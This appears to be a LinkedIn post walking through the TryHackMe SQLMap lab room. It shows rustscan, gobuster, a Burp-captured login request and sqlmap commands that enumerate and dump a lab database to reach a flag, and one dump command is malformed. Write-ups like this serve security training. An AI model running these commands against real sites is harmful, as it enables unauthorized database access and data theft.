SQLMAP -TryhackMe Writeup

SQLMAP -TryhackMe Writeup


Task 1: Introduction

What is Sqlmap ?

Sqlmap is an open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications. SQL injection is a severe security flaw that allows attackers to manipulate the queries an application makes to its database. This can result in unauthorized data access, data modification, or even a complete takeover of the database. By automating the process, sqlmap helps security professionals efficiently identify and address these vulnerabilities, enhancing the security of web application

Task 3.SQLMap Challenge

Started by running the default Rustscan.

rustscan -a 10.10.130.206 -A -sV -sC         

I discovered that port 80 is open.

I accessed the website and found out this

Next I ran the?Gobuster?tool to find any available directories.

gobuster dir -u https://10.10.130.206/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
        
I found? /blood


It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.

We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.

To enumerate the current database

save file to sqlmap.txt

Now Run this command for flag

 sqlmap -r <file_name> --current-user        
sqlmap -r <file_name> -D blood --tables        
Here I FOUND TABLES
sqlmap -r <file_name> -D blood -T flag --columns        
sqlmap -r <file_name> -D blood -T -C  flag,id --dump-all        
Wow I found flag thm{sqlmap_is_love}

Thanks for visiting this my TryhackMe Walkthrough.

VRIJANANDAN KUMAR


Chandrabhushan Kumar

Senior InfoSec Analyst || eWPTXv2 || 10x CVE ||C|EH Master || OSCP Aspirant || Bug Hunter || CTF Player || Security Researchers || Pentester...

9 个月

Keep it up

要查看或添加评论,请登录

Vrijanandan Kumar的更多文章

  • Red - TryHackMe Walkthrough

    Red - TryHackMe Walkthrough

    https://tryhackme.com/room/redisl33t Initial Information Gathering We begin our reconnaissance phase with a Nmap scan.

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

    1 条评论
  • Library Tryhackme

    Library Tryhackme

    Start the VPN you have downloaded and deploy the TryHackMe machine first. Then, ping and check the machine's…

    1 条评论
  • Seppuku | OffSec Writeup

    Seppuku | OffSec Writeup

    Network scanning We used Nmap for port scanning. We used Nmap for port enumeration and discovered the following open…

    1 条评论
  • TryHackMe: Mr. Robot CTF

    TryHackMe: Mr. Robot CTF

    Difficulty: Medium Room URL: https://tryhackme.com/room/mrrobot Scanning It was known that port 80, 443 and 22 were…

  • Tryhackme-GmingServer Walkthrough

    Tryhackme-GmingServer Walkthrough

    Network Enumeration I started the network enumeration by running a port scan using rustscan looking for open ports and…

  • Lazy Admin TryhackMe

    Lazy Admin TryhackMe

    Easy Linux machine to practice your skills Enumeration I started a Rustscan scan and found both an SSH service and a…

  • Katana Walkthrough (offsec_lab)

    Katana Walkthrough (offsec_lab)

    https://portal.offsec.

  • MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough) Today I’m going to solve challenge MoneyBox Vulnhub WalkThrough. Offensive Security Edit…

  • Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough) 01.) Target Discovery with Nmap 02.

社区洞察

其他会员也浏览了